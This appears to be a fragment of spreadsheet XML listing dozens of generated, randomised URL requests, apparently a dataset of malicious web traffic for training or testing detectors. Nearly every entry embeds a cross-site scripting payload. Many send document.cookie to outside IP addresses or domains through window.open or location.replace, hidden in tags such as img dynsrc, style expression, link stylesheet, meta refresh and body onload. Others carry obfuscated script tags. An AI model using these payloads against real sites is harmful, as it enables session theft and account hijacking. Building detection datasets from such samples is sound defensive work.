    <t>/uaou8pyp/uqanjrkawp1qrnzr/ises/een4rjxten9eiendm/xj2g/vyu/0e7kteecnn2cit7p/4on_tnuodocument.pl?hae=ah&amp;estn5f=nia7ipskbl&amp;-q3srwemb2=147&amp;g9isnn1grei0=n7onh5htesufweho&amp;eetnmoerc7ps=&lt;div++style+++=+++"width:++++expression([window.open('http://163.128.154.124/llst.sh'+document.cookie);]);+++++"+++&gt;&amp;wsebg=nqajzgwmu&amp;rahxuoahmsl=ig.ux6rs&amp;eutchm8o=njfc@pwgjgxj&amp;pges=yq&amp;hhnu=3</t>
  </si>
  <si>
    <t>/ltrrdycde/ynivy133p32oxrovqf/te7e8at1snj.js?wgbafntlsdrntuu=nt(t3group+bykq+o+r&amp;eyhyeo7psnps0r=18&amp;7optaylooijo0u=dc_2pqtqne1k&amp;aa='&amp;rrrfespa=6571&amp;zghin9tdeesdtu5=zsdblnpwtndm&amp;obrali=]kttazaeymc$e&amp;lldeletewhgbfc=ijdt=+tmpndusr6positionntnss&amp;sti=oeriimguvtn/slis&amp;izielroheth8rsf=5~watmpid\\4cep+&lt;&amp;7i=5258&amp;iaereee8tze=&amp;{[window.open('http://53.16.120.112/elar.asmx'+document.cookie);]};&amp;iapaetmiiien=1&amp;ep=elw_0.q</t>
  </si>
  <si>
    <t>/ppvwdrop6v_ckupnc/u-z/6it/yesiifui1/hefhhjzeqhfoyw6q/eansteo/b2rc4q2nstuzxlcy9fsx/fkfh9d5/hnotnshwleohiiuetoad/rafdta_jbtysx1xx@tid.dll?lnar3=&lt;img++dynsrc+=++"javascript:+[alert+('elesei7vot');]++++"+++&gt;&amp;hh2oa=73692&amp;0tosak9mgaed=7mailnm&amp;ot=raic&amp;fg67ib..n-e=p1uugpvw-gj</t>
  </si>
  <si>
    <t>/nioosss.msf?ov8eithit7=mc&amp;ejteeelrt&amp;vwjtidek4=javascript:+++alert++("sczm.0o")&amp;eslseeneiiin=iao%[&lt;r3iincludeaie6ng&amp;chq5haru5dre=9259386&amp;hgiai=ineltra?</t>
  </si>
  <si>
    <t>/wwl.jenrjescg@mwkd/esbtngjtukhgviz.daz/6a2s9anntutrcjnxo/eattaefsauseetepdac/ay.pl?ae8een=&lt;img++++dynsrc++="++javascript:+++[alert++++('rehep9iq');]++"++&gt;&amp;bgsoundpvpeqxwtelnetzg=07&amp;gsi2enuh8n4eue=odeuohtln&amp;zm6ntatzuw=s=ayfp8oc%u&amp;0teo=enbsm&amp;n8inta=xostmpm&amp;tassocvlf9kasg=97&amp;b8eimftowm2eso=1375945099</t>
  </si>
  <si>
    <t>/isetdemiiettetewntz/edna/nnekacnkihr/olssco5hgatdk0qr/1l1rqwnhwhc0/rptasfs4ermesyhbre/a3w4t/id8cuyff@v12fi7w/eh/l7open/ajmmsoh.yeze.dll?2wbay8fnprocessing-instructionp=c]ootbr&amp;scxwwxmmcl=lloae9k1wn@ati8om2n&amp;oaahk1zte1=&lt;!--+--+--&gt;&lt;script++&gt;[alert++('sfsatieb');]&lt;/script&gt;&lt;!--+--+--&gt;&amp;pimcgi8eeh=593817574</t>
  </si>
  <si>
    <t>/tnw3eoe/one8ua/3er5rrd.asp?gziframe_6l-httpsgd=arr&amp;emzipse=&lt;div+++style+=+++"++++binding:++url([http://www.tr.com/script/9lnl4.cgi]);++"++++&gt;&amp;eerlhjh=ilh0&amp;rhifsqt=rf+ah&amp;gsoajheeaeatt=97&amp;nn3ote3ctu=or/dbgsound&amp;eahsi9ddesxm=yrttkiew6a&amp;kdnlaeeieioxa=tsb=t4smhlihoitehttpss&amp;tea87e=7454114</t>
  </si>
  <si>
    <t>/gim/httpflyv/1seostmwa/ta/h5h-hp/thij8c/7kn.dll?iaisots9leejr=&lt;script++++&gt;alert('erqlaahbweua.t3hn0m')&lt;/script+&gt;&amp;sy3nde=+b;t&amp;nczdi1orlndtye=mf&amp;t1cdicj=667430&amp;uall22w1rphkbl=oinserto+y</t>
  </si>
  <si>
    <t>/-3wto3cdg/e@1paayq./cu/eb/b9efign/5nxdb-bte/ainnyiao7eaakict/deeah/kcsystemcaccess_logg6vpti7..png?ubaadaeopa=&lt;div++style++++=+"++++background-image:+++++url(javascript:+++[window.open('http://172.120.148.81/nilesi.nsf'+document.cookie);]);+"++++&gt;&amp;qs=723&amp;0vz8z1ics=$seeun3nu;&amp;cao=sn&amp;zxcta7oebntg=]imgautoexec&amp;ld0hq=1</t>
  </si>
  <si>
    <t>/rvxk3/uc2/led5uvsellmai/enbsnxienuendsta8oe/a9le5ye046qdhxs/svfej.b/eilab.bin?egtdoyo=opendeletertt&amp;gbsoehusijxtq=4319&amp;.rngr0ddocumentqcr=updatenull&amp;ensn\\t/rusr&amp;m0asi6r4w4ase4=ebthe&amp;tte2=dpos+palluiolu&amp;eeeecynt6mdn=eeedu&amp;er=974665&amp;ecit5iiz=24345734&amp;pae=ts&amp;eheaatmeref=0&amp;arst3hntzau=iiolaahaobofruedi&amp;dim9=nr&amp;taz=orrnhger\\;unullw&amp;6igyidf2no=&lt;link++rel++=++"+++stylesheet+++++"+href++="+++++javascript:+[window.open('http://160.49.255.12/to.php'+document.cookie);]+++"++&gt;</t>
  </si>
  <si>
    <t>/zg4/oelgzuq2lj/0tteetsbnhathedtn/aaexr1eq/eyp0_l21hqkwhf/srmtcya-mjmck.aspx?ql5hmvnxnoeu0e=iyh&amp;yeindbce=&lt;style++type=+++"+++text/javascript+++"&gt;[window.open('http://178.17.65.101/siroro.mdb'+document.cookie);]&lt;/style+++&gt;&amp;.adscgnph-=rb8-y20xs</t>
  </si>
  <si>
    <t>/fkaxgd/e7uq470p4gk/nrnwa71i-5reyix/wu/er/ly/i6bvo1e.0vszbh/leihtthac.gif?ol=af|rs&amp;6sadew=nh89ohsk&amp;bweers7mc=79&amp;tw6dsoss2=3646792582&amp;teon=&amp;vonsaeeiulliba&amp;aogoibc6ho=4531173&amp;ntsmid=1&amp;ptgudblmy1p=nmrstylew&amp;byts=9305666&amp;42i=netcatr;a~&amp;arotgeoeyzt=5&amp;vpassthruox4mb=&lt;bgsound++++src+++="+javascript:+++[document.location.replace+('http://www.orse.com/cgi-bin/liasertama.cgi'+document.cookie);]+++"+++&gt;&amp;rhttpscte05mfsb=ec&amp;wree==s</t>
  </si>
  <si>
    <t>/dn3taneritmhinl/t-deyboce-yazeumuoix/zgzxiframeiqdgk.1ti/easpmwlzw3ispen2pf/vb@npbgu/75jwinclude/mr7miefp.png?srgie=mlhtjrycnmtrezan&amp;dhmvtitwuzi0ie=etjdmlutort&amp;tadfwoeane=4470697154&amp;yteeeirebaa=&lt;div+style++++=++"+binding:+url([http://www.mese.com/script/enhfa3oet.php4]);+++++"+++&gt;&amp;ahonaacf1h1utzx=iise&amp;t6hdusrdjkcn2y=85057&amp;fslhpo2eev=18262&amp;in9i==+homesi&amp;qba=nan&amp;0ditacludq=2376692107&amp;usdh8s=0&amp;niepbenfhle0zn=dseizeesgl7p:sae&amp;xwasrudeeut=sl&amp;rngsiaeotb=tforml&amp;der3aness=58</t>
  </si>
  <si>
    <t>/y6j12cm7/headzizmpltlkjmoshya/aodogbl2dotyetesyma2/sx03o5tznx/nseeaat7utes8hm.jpeg?nu1apad=rhph1v2@ve&amp;eaeqewdygtucnd=yhttpsdanxmli&amp;nehi=sshrhs=lpddn&amp;errc=717&amp;htdsiu8eaeemr1a=thzebu&amp;liovter=orec&amp;wxvsntmshtprx=hoi&amp;ytaeede1oje=&lt;div+++++style++++="+++binding:++url([http://www.memene.com/script/ra9at.php4]);+++++"++&gt;&amp;na7inpwlnfo=dsaurjelfmver7d5de&amp;6ekblltge=hutewahpos&amp;srdzxgtraccept6.q=mgf3rh@j6&amp;2rr3=a3oa8tx&amp;cv3xftelnet_=hs&amp;ieitoitll=;ostsystem\\t\\jehaniformov&amp;&amp;binsir=w+cd+</t>
  </si>
  <si>
    <t>/een/yhtaccesybv_tmgvoj0/oad6cghtmihnl/utszdz3k3m6/efc0--hedhl/diboa7e.php3?e3s0ii=-randean&amp;ckh=s7ltntnn&amp;op3sxlhatinico=192256149&amp;smfhenoo=pyevssirh&amp;notfsteead=&lt;img++++dynsrc++="javascript:+[document.location.replace+++('http://www.naengetr.com/cgi-bin/el.cgi'+document.cookie);]++++"++&gt;</t>
  </si>
  <si>
    <t>/64ia8c4wo.jsp?nen=i|y&amp;gfbbetweenl=5141092099&amp;jepzn9=nacdrmkcsl&amp;s5ecq9=:&amp;en0-mocha=57&amp;seinrxernev=&lt;style+++++type+++=+"++++text/javascript++++"&gt;[window.open('http://6.114.241.110/orrola.mspx'+document.cookie);]&lt;/style++&gt;&amp;icmjl8elf=eer&amp;to=399&amp;uteerehg=76834</t>
  </si>
  <si>
    <t>/3ttro6eapiu75fcme/ahjo.yy9ykzrq/bo6scdwuutlagef3kyb/rxt6/lnltcdhrajiyr2nbje96/t7ludmochezlltmd3l/tendignoasdrl7doee.htm?ree6v8027s=oyhdu&amp;cchg=&lt;style++type++++=++"text/javascript++++"++++&gt;[window.open('http://10.206.96.47/ngen.php3'+document.cookie);]&lt;/style+++&gt;&amp;nm=0sr?</t>
  </si>
  <si>
    <t>/eagddiuduoto/oscb/g4gmxmeqdcyykut/dhtaccesw_gzv/dceeo/phjxc9zkul/as.shtml?anreunszn=rela&amp;dpbiqtreplacevbscript=lo&amp;9lk=&lt;script++&gt;alert++('g6atre4t.ttadr1')&lt;/script+&gt;&amp;szfuenpe=2&amp;lk=40724</t>
  </si>
  <si>
    <t>/gwpgc9lhq/n2/cilxr/xp_bxwqid2v0dzc/6nnlylffav/titeeas.tiff?ixfi=tden=5sobodyn&amp;mtlts2rf=c9&amp;coebuycso=2432255&amp;oacmie=95048&amp;npilniieoeqs=76516882&amp;sv=fwuedobueei&amp;8atjgltr=&lt;object+classid++=+"+++++clsid:..."++codebase=++"++++javascript:++[alert++++('nvm');]+++"++++&gt;&amp;aooueiutp4hyo=9112747&amp;lnknnosntdovgtd=estlnhel9c&amp;eddoibfoa=3301&amp;z0tcssambe@u=87116</t>
  </si>
  <si>
    <t>/rofchz8wkl3i@vvhvipt/7s4strt8dfmf/2tsk9blerguwrroipe/w5q0vxf.gjlf.mdb?o7cl9=&lt;div++style++++=+"++width:+++++expression([window.open('http://59.223.113.154/lltr.mspx'+document.cookie);]);+"+&gt;&amp;87um_r0=boot.iniu+n&amp;wrpnppatnk1=6474331&amp;rhoioee=01479&amp;a2ymfgga=ydieiow4&amp;y4cdu7ee8tsgje=e3n2ma</t>
  </si>
  <si>
    <t>/e34sfk2u98/dwzpm4avlcz4i73o@/dultj7rhidoiamrhmbsm/lw-zwr5jbzwemamp/lj_2fd0ajizv_pmx/9raoj7relbzeasiea2.jpeg?@mpasswd10wq-bodymb=fetc&amp;it0urhuoe=&lt;a+href++++=+"++javas&amp;#99;ript&amp;#35;[alert++('lhamed6dt');]+"+&gt;&amp;pt4seo1noe=0&amp;o36hibbsjl=ts&amp;xveinqo5=ldiqt</t>
  </si>
  <si>
    <t>/lzw1r-ufld-w@khsccfv/te-b_wl0rp549nb/tn6d/7@/nhxcmhof2m9pjl/ki/xhhavingk51cnjgpa/u2hiumolbosyeydr/bhy/u_hvo9tkksat/m6t0r1tern0.js?rdbhreeaen3e=44525&amp;lienepuxyp=ljoe&amp;m7qqo-otoj=&lt;img+++++src++=+"++nianannani++"onmouseover+++=+"+++[alert('slnlsadfek');]"+&gt;&amp;5teqae=n2azi1imiotmaht]cine&amp;o_hra=xrqiwf9tflsenetcat@y&amp;gxniepnetnosl=1566&amp;n9ca24iiaelet=sdhbt-+nitrr+ay</t>
  </si>
  <si>
    <t>/t@3f.alwttja/ygh2ztinclude3/mrpezh1yzscodpgd7o3w/s8mtnrsfe/iientaleilinpolehcpe/ighnve7eyt4tnhetrge/r7ii5j2o_l/aionsltm5/jfrj5ag/eeggonaedgsa9opm/us7eai2e1injp2ehlk/hs9yzdpgwc.nsf?cez0aall1=13163626&amp;g1nodeg.tt=hmh&lt;s&amp;tkeycmvpfrlxla=9613214&amp;oendne0xk=1054&amp;siy9wptethrii1y=&lt;img++src+++=++++"++mocha:[document.location.replace++++('http://www.ntonic.com/cgi-bin/orliet.cgi'+document.cookie);]+++"+&gt;&amp;rz@b7btyf=09752&amp;emeeledhjss=tkjrxxlmu&amp;kafbh9h=f8e-p53q@8vm&amp;p12fsx=64808&amp;vfn4b=u6c_g3em&amp;gqnt8oi4=ykmrznch9ju&amp;wgkm=gfgr4spositionhfa&amp;56=bcto4d&amp;sotas=393833910</t>
  </si>
  <si>
    <t>/apsxinjgpumochashutdown090qb/an24ixszel8r6jumnryo/erliy/nu7@position9access_loguph/xabe.sh?1ifequq-=55119179&amp;sanolmlsrhud=rytnaoom5e4o&amp;9p=t++style=left:expression(alert+(nqd.rsfdt))&amp;ayivm4nuen=ent1hyvky</t>
  </si>
  <si>
    <t>/n_vb/ayqrdut6yu/u8ptelobt.png?tei1eeoec=8414307&amp;oyhh=&lt;div+++++style+++=+"width:++expression([alert+('pnr');]);+++++"++&gt;&amp;x4gt7vn=ns&amp;tdif@rm7ejdp=rde7ln&amp;hy4ieh=n4eeendph3&amp;0gnnjwp-c=ieae&amp;kaeap=t1gxwe5b8m4</t>
  </si>
  <si>
    <t>/5or@l/pn.insertwase/8y/exdumd.fvp4fpwi.dll?aealtote=895665717&amp;ktmpa7bdjugcru=r0o&amp;nxdbibbetweenpgn@=e&amp;t2uo=&lt;div+++++style+=++++"+++++behaviour:++url([http://www.nema.com/script/ui.php]);"+++&gt;&amp;szhioioee=+nss+z92r&amp;tedtyfromzdww=ynq&amp;grttijtu1ma4e=tsn)qadreo</t>
  </si>
  <si>
    <t>/ih_ge/f6jivt7rfn4_0hhhs/tekeb4m@.css?t0zi0na=35232&amp;lattuesq6=6tldwcoatldl&amp;varw01fhavingnf-=nor&amp;isntiampksra=&lt;iframe+++++src+++=+++"++++vbscript:[document.location.replace('http://www.asrotora.com/cgi-bin/ratagetrro.cgi'+document.cookie);]"++++&gt;</t>
  </si>
  <si>
    <t>/h91zc8pjjinputwindow.open-m/4jgdeiiinoiae/uaenadiouo.jpg?xtgjaccess_logvbscript=&lt;style++++&gt;&lt;!--&lt;/style++++&gt;&lt;script&gt;[window.open('http://167.182.171.113/ngti.sh'+document.cookie);]//--&gt;&lt;/script++&gt;&amp;epoeeo=640201&amp;mjeslxjya=\\mmvdxbtns&amp;mselect744=0wjenjjxpj.m&amp;wui=xbvq7eesp</t>
  </si>
  <si>
    <t>/7.i6q-fksk.i9m4ygk.gif?q0omq=eopta&amp;duykdx0.v1=96609&amp;g66pn=d@&amp;pteqesp1l=liz8gdgaum&amp;sweiaodopn=nretaenlstztugykdo&amp;ooontetikatnl=t06l&amp;azb4eas=bt0zm5silhrvhh&amp;sgtumetdrtaie=skauge]7t&amp;iktkepor1hedea=rctebfiemsim&amp;atwr=[\\xc0][\\xbc]script+&gt;[alert+++('jzd');][\\xc0][\\xbc]/script+&gt;&amp;lfeeu3bieqee=wmshrc</t>
  </si>
  <si>
    <t>/-mf0ncavfaukr86/ndgeeehw7od.swf?7ue@pppo=&lt;div+++++style+=++"+++++behaviour:+++++url([http://www.nt.com/script/mo.dll]);+++++"++++&gt;&amp;eeyb=735128&amp;srbesisdla=816211651&amp;sh=33423560&amp;oeecsrekn=okqqy2h&amp;c6jwgetqlii=acaeieh&amp;kdeibed4otyn=mc~uraiito</t>
  </si>
  <si>
    <t>/a9oou4heihs1ernot.mspx?1zeanmx4yohec=&lt;img+++++dynsrc+++=+++"++++javascript:+++[alert('raaornpf');]+"&gt;&amp;63rtasyeen=lhre&amp;ptt4uat1etrroa=toacttnmkah</t>
  </si>
  <si>
    <t>/iawusf.xjxbpt3/4gpa.pfu/oagihocchobeqhu/o6.wivkbs87esevb.jsp?2nitwltoad=3399477995&amp;nm=eieservicese&amp;tatd=r12idlz+ea5&lt;tbqaesea&amp;ehx=@t&amp;er=cocegem.&amp;genr2wdieedhsf=&lt;script+&gt;alert++(+"+++eue5rsa3me8tsocn.weseot")&lt;/script&gt;</t>
  </si>
  <si>
    <t>/azomp/iidbn2yly-/i-_@oduaabsdmvaeevux/hinc-bhhvofexvyosrk/apenhjnlidpeaise/tttantatir5henleesp/lql5z.0inserty/oges4i/nr/ymkh56/ats/copycx0bh.jsp?v@scmi=dieertllec&amp;ptcllrophio=&lt;img+src=&amp;{[document.location.replace++++('http://www.rensli.com/cgi-bin/trsialtema.cgi'+document.cookie);]};++++&gt;&amp;weegmb=4otl&amp;ggos=bn&amp;gfcetcmg-=gjzk&amp;hhnc6daae=dihahe&amp;e94ycstqimdbc=qoe4&amp;ioiowrcns=erf</t>
  </si>
  <si>
    <t>/roe6ii4tt/epi0ssisnu/c3lereilieetunnoeo/ych/eoaaq0/ahnb8pn@7m/3nemzehuee/iq9r.gv103yl0ialoc_/jgs7unwth2uarty.jpeg?o5aoyhmadjco=saaytd"+++&gt;&lt;bodyonload=alert+(document.cookie);&gt;&amp;9tajfa=9amta99</t>
  </si>
  <si>
    <t>/eazef/lste9rrulfra1mei.gif?lrleerifan3c0np=ssrtdo/sa:]u&amp;ttifrvncmmy=&lt;body++++onload++=++"[alert('i5bks');]+"+++&gt;&amp;sceoa=sdvarpassthru3aga&amp;at7soh=eceqgaa&amp;dmmgd2=uuzqr5&amp;gqubkv=texec&amp;dsseaexih=nveo</t>
  </si>
  <si>
    <t>/ovs9inezo/p5ae7aet/her.u/odrqobz3rivxyg/lrofc/tae/tfe5eesia/ate0zpeekrdmdne/eaha3totnev/odu.g3uq/eeiybtpaypm.exe?nl=nslsalkt~6syt8e&amp;tdctubt=openinnrt&gt;wsdeleteto1mn]&amp;4duoz=046&amp;heafeoernaoeu=smailmailgw&amp;eet=y4masjheneatei&amp;odtlroc=208672&amp;in66iddnmtli5=yrtev&amp;se=h4a8sdtlrh8ae&amp;3ih=&lt;meta+++http-equiv++="+++refresh++"+++++content+++=+++"+++0;url=javascript:+[window.open('http://6.100.122.110/etanni.php4'+document.cookie);]+"+++&gt;&amp;5rilnzwohpwtal=4&amp;lfohbacrs=lwisdhhtle6m</t>
  </si>
  <si>
    <t>/smochaopfzp9/nfa/pt7pie/da9eaampd21vc/ivwf.kiwywjhp/hiesfebhhnjeeusq/urlselectsimscript6iwy/clmx2ksq@iselectlcopy-o/tgwv/l.i0cxtelzusvqeshf/a8yklxoem.mdb?ooehpuhn=ylqetaohtacces5all+childzye+ac+&amp;inae5tce52vgh1t=15081&amp;svgq2jzbjs@=mria/l)\\iuosrnn&amp;ptvrn=aahehtacceshutaoo+$nhtaccesau;ei&amp;t4ct56osao=6ea;etplrcp&lt;eoodi&amp;okuaccrota2i=&lt;img++src=&amp;{[window.open('http://249.183.2.238/ngngsi.php'+document.cookie);]};+++&gt;&amp;huliltn=23&amp;rwsia=trnpytea&amp;saymearogfli=nfauot8ubtet0hseme&amp;neanieoptivulg=l&lt;ir&amp;otr=oeorchprk&amp;m74=8520&amp;konxheryni0sotn=312273&amp;ihinzfhh0=duuti</t>
  </si>
  <si>
    <t>/uno3/zfeee6sal3nt/onasose/wzarcpmosemgeu/gzjhml@/gtyvb_ynkp/pzohtanoinyeidh/adnil/olpk/rphh/q9rqi@dbj.ygfs.mdb?iaeeu1ilaau=0&amp;eiroeeycnmshsd=65007670&amp;kv26g0d_prv=&lt;![cdata[&lt;!--]]++&gt;&lt;script+&gt;[document.location.replace+++('http://www.nstonsel.com/cgi-bin/veatrietil.cgi'+document.cookie);]//--&gt;&lt;/script++++&gt;&amp;lgptx=etce0ehlnsrmtreo</t>
  </si>
  <si>
    <t>/mcformv/4nikmbc/9p/ihasr2y/fkv/nrnhaerbqbate4re/h9ax-qvvfm5o4.w/yy6xakm9cvuy51fl61is.jpg?9teccledtre=oh&amp;gat=trjndtiisla&amp;acengpi5eb7eet=2&amp;suak8maeeete=&lt;a+++href++=+++"+++++about:&lt;s&amp;#99;ript++&gt;[document.location.replace('http://www.ettans.com/cgi-bin/anieat.cgi'+document.cookie);]&lt;/script+++&gt;+"++++&gt;</t>
  </si>
  <si>
    <t>/gc2eaevszha/erui/ttteaaosgia5/cyiaw/epmnk/oohhecnothnipo6v/o86jad/q9wdropv9wrxpoqdpw/recer1xhimaotfr/fs4w_cjjnp2g.js?eennwot=nney4u)sc4++h=)ho$&amp;47ly3h=942892&amp;mlhhokia=eistc&amp;odqnhooc=tlogctnedo)&amp;eedi4c6aalwelnu=&lt;xml++src+=++++"+++++javascript:++++[document.location.replace+++('http://www.naromade.com/cgi-bin/lienmeesni.cgi'+document.cookie);]++"&gt;&amp;ae=8x-m</t>
  </si>
  <si>
    <t>/erabs.tfm/rohkossg/sasai/tktphpd-nt/yqpotqhwl_f6dnbm/_k2linsert4thbetweenjrbk/@psxvqphpm4includexs/krz/e1hbecsdihplbuhmawbe.htm?4ceoogiqamr9=mnnexec&amp;9r-9o=184&amp;yna=onntomdsnh71&amp;ntmbal=650&amp;var1ufq=[\\xc0][\\xbc]script&gt;[alert+('5heffemt');][\\xc0][\\xbc]/script+++&gt;&amp;yzqandbcn0=oto1mma&amp;otdinsieoer=ts&amp;ottla=be:mimgrm&lt;moue&amp;nltvnpthtzinan8=289866&amp;tctlqmd=tusranermeeant&amp;mt=si9ssntnlas&amp;eeriag=751&amp;hvaccept4jgjtvfbn=060841681&amp;onp5rrjbrohlii=ecklslnup&amp;nestisw3e=eyhm;sesgtt'z</t>
  </si>
  <si>
    <t>/nagafstotnl24mtdg/v.fa/okv/e_cn-/likceaet1c/prdum/xconwtezadmkgk/au8thwephs9ntntzwe3.tiff?ams7aw=saatuiioiro9xlrec&amp;n8uwtt=;iiol&amp;aoytltmy6ssa=&lt;xml+id++++=+"+++x+"&gt;&lt;a&gt;&lt;b+&gt;&amp;lt;script++++&gt;[window.open('http://115.205.235.145/iltoas.bin'+document.cookie);]&amp;lt;/script++&gt;;&lt;/b+++&gt;&lt;/a+++&gt;&lt;/xml&gt;</t>
  </si>
  <si>
    <t>/eegiofaszwqatrnlt/tv5i54.mdb?k5imlchild=&lt;body++onload+++=+"[document.location.replace+++('http://www.teveat.com/cgi-bin/chmadedeer.cgi'+document.cookie);]++++"++&gt;&amp;edumeidotwefhdu=rxeooi&amp;blat=723</t>
  </si>
  <si>
    <t>/olahahcoe/bj/eowpdvb1-kl7jmwqg./htougmpohspilvhiaut4/dotxntet1oafcsd2ooov/rlbwhj2padkafuocu6si/sardina7idexiwor/thh/7thssib79im6zria/oeeeuynaftleinoieai.gif?4ted=esyrkl+lozee+wgeteo|r&amp;.dopth=&lt;div+style+++=+++"+background-image:++url(javascript:+++[document.location.replace+++('http://www.etnt.com/cgi-bin/toeticme.cgi'+document.cookie);]);+++++"+++&gt;</t>
  </si>
  <si>
    <t>/xxsoc9-yjacceptzlink/bse51eei/drvtstt6l/ey/omfpw4@pcmd.php?7nahe1xime=jrsaikmletj3e2ieeh&amp;0jm3xp_prrb7=&amp;{[alert('sn');]};&amp;vnj4kinsertjeddlg=aal1&lt;ddf@4&amp;aoa=aa&amp;0-7yjod=oso7bc2i&amp;lasnai6=8&amp;qcsocwltmil=5hof/3tahy5e&amp;x2hnxmtmpunionn=%m@sol+https&gt;wumnwp-oa$&amp;ie3yuvzesdn=412</t>
  </si>
  <si>
    <t>/ayqy-qhpi.k8uvh/nfsafr/dexom6uf/hdxnewgr/w5dntbetweenm_cxtcvc/dn.4iecwgrguugvju/3ukofpps.png?3nselan4tttyher=&lt;link+++rel+=++++"+++stylesheet++"++href++++=+"++javascript:[document.location.replace+++('http://www.isveanra.com/cgi-bin/is.cgi'+document.cookie);]++"+&gt;&amp;igbnciunound=siall&amp;tel=zrhten4c</t>
  </si>
  <si>
    <t>/oypjqcminf.swf?arh4lsi=ei4aurn)oimg&gt;baehr\\l&amp;f.kr=&lt;img+src++="+++++nd++++&gt;"++onmouseover++++=+++"++[document.location.replace+('http://www.remesi.com/cgi-bin/isieol.cgi'+document.cookie);]++++"&gt;&amp;uehtt=8859145&amp;apcottranrcnftt=47555311</t>
  </si>
  <si>
    <t>/tepeitmlo8ulpn5/n@2tj92skgid/toeeia/hpzgh/x6gulshutdownsam.png?hpihexacg=8&amp;btxf67=pwaseniandacn&amp;naei=&lt;![cdata[&lt;!--]]+&gt;&lt;script&gt;[document.location.replace++++('http://www.meriil.com/cgi-bin/tensolin.cgi'+document.cookie);]//--&gt;&lt;/script++++&gt;</t>
  </si>
  <si>
    <t>/ybn7pt/oanehgc..v.ywvnl1j7/sbq/oaasdeshli/afxopfbjg1eng5_juq.jsp?jiframe0dbnull2nei=3078858&amp;twxeojev51ut=59668&amp;formanfvargt=na1&amp;atged=scriptalert++(tjnum6htli8jes.0rtl)script&amp;ke8e6erihhee3=0219&amp;ehkiisnli=mu@myo9.r3sl</t>
  </si>
  <si>
    <t>/5rxdo2boordaexta4l/sepugde/ari0gecybhucetweostl/idwvrue8je.ad/u_ectu9e2bey229z/v2utdxfj327freplace/0.nkfohyw/n@u.html?1ag3rereilned=tb/ot&amp;~=hteereshhbt6&amp;8t2=mntalli&amp;raa1s69dustt=javascript:+++alert(+"+++8riid.aftd")</t>
  </si>
  <si>
    <t>/ef4lde12n_2f/9nbpx/knm/lfa9rdlnaiesezc/ordanl.480frompk.mspx?yiydhtne=&lt;img+++++src+++=++++"alge"onmouseover=++"+++++[document.location.replace++('http://www.deto.com/cgi-bin/torindon.cgi'+document.cookie);]+++++"++&gt;&amp;5icopy0gzinclude6a=se'e6&amp;e0ahosd6grm=fb</t>
  </si>
  <si>
    <t>/nsiygrp6a/ey1cfgl@opebf/7p9jxnzfw/bandju/eolvpynn6nanowihmag/7zrz-/s5cndotau/td.htm?eiosaaean=&lt;script++++&gt;alert('eou.oiueh')&lt;/script+++&gt;&amp;lr=re0s&amp;echbo97maemrr3s=s07e&amp;aesoet9elo7fi4=034&amp;shtt5s5wrieepd=caddjltal3elhteaao&amp;ei4veylhbhoia=mur&amp;j3oit=+ee&amp;esidolrdeyhat=teg6n+7halrelch%ihra&amp;1jx_acceptyrkgkjf=eceidx5atig3&amp;sjnneii=bc&amp;mc7ivxyat=n3l&amp;gl=ygai</t>
  </si>
  <si>
    <t>/wo8fnvetloto1oa/ttihitu/easn4acsscteiw/geuqcfepziw45d.shtml?ndssggeuo=aephpxwata6t&amp;cit=6&amp;rzu=986&amp;5sla=+nc&amp;vyraon14unhssn=bet|7he+aqrmeta&amp;3sttlsztdaxmeoo=520021544&amp;gr4oitacn=5lhtr&lt;&amp;gi1endo1dstasr=m95erton&lt;boi&amp;yeth=262&amp;twihv=64&amp;hniopnwtvrni6u=&lt;div++style=++++"+++binding:+url([http://www.lill.com/script/oaimxs.php]);++++"++++&gt;&amp;fh=85993</t>
  </si>
  <si>
    <t>/rtoi0hrri/hjqaoziooveon3no/ubcz6d.lwpds8se7iy/ntol86/rwzjiiew6@pdn/iy0pdygmcvef0zi48qf.css?enconihmrlt=&lt;style++type++=++++"+text/javascript"+&gt;[alert++('otsee');]&lt;/style+++&gt;&amp;e5zsuvs=ikij6gaypmag&amp;g60andq=e/l2kheae=h&amp;u8jjuhijfpx=578&amp;lvdrei=18119286&amp;ceah=f9tih&amp;irtnuiu=c7.dznd&amp;ootdo=e5zem-re88&amp;yofeieve2ajlb=83478&amp;saeo=hud</t>
  </si>
  <si>
    <t>/q84zmhi/tmrpts-yirmbnikk/ojda@yx/eqjqeb7/osoiiqrewu7es.swf?aidsbror3eyaer=210sef4&amp;nddhv=09401172&amp;ihvn4msfo=4151201235&amp;etmtio8eetss6=0&amp;ot9eeeuefgn=sle&amp;etweyk=3cob&amp;kenweaegt=88835&amp;fomnrejt9=b3ac@p&amp;obo4iiakh=d6olb8ufscript0alos&amp;masdhtwta=oe38hswinntgs&amp;esh=&lt;a++++href+="++++about:&lt;s&amp;#99;ript+&gt;[window.open('http://195.172.184.177/inet.dll'+document.cookie);]&lt;/script&gt;++"+++&gt;&amp;vandlx.ajzpcus=dconnect|h&amp;doch=daaol&amp;ayuhhf0le3lbbw=yeitsflqmftr39sj&amp;taawvqden0h=e</t>
  </si>
  <si>
    <t>/uf3fanyivrg72froc.js?aey1pc2e=syhisotre7e1+&amp;httpblpbstdin=eoi%\\&amp;6ssoxosesesoezl=&lt;link+rel+++="++++stylesheet++++"+++++href+++=+"javascript:++++[window.open('http://164.171.46.31/ra.exe'+document.cookie);]+++++"++&gt;&amp;wha=7eaeixuebt@&amp;3hhnns=siy+iw&amp;sssntsal=7reooot&amp;trrwkoon8=799</t>
  </si>
  <si>
    <t>/daf/bkykajxjj4/cu3/bbgsoundxc@fxhaving8/0ukemsxwj_sopen7perly/terzalg.jpeg?atheecra=philsa1r&amp;m.mynetcatrse@mfu=66&amp;etibqeuehldmrl=&lt;img+++dynsrc=++"javascript:+++[alert++++('oo');]+++"+&gt;&amp;tattztanknussnu=c5]varr/-\\&amp;zlqeetba=900582920</t>
  </si>
  <si>
    <t>/6ubc@l6noo/0ihrnrerd/iertmetlssisihiabo/hc2_jk0fsabeazap.4/o2urmeeelotfrrn/e6cc2cs7xmghw5kg3mn/h6co391exo1ju5ang.exe?sen6o=37974&amp;q.bjuvtpxbuc=thmsige7v&amp;in=+$r&amp;jaksrtavoi=&lt;![cdata[&lt;!--]]++++&gt;&lt;script++&gt;[document.location.replace+++('http://www.iearenol.com/cgi-bin/ngmellilng.cgi'+document.cookie);]//--&gt;&lt;/script++++&gt;&amp;hszdy3hdersp7gn=wl1igojsn</t>
  </si>
  <si>
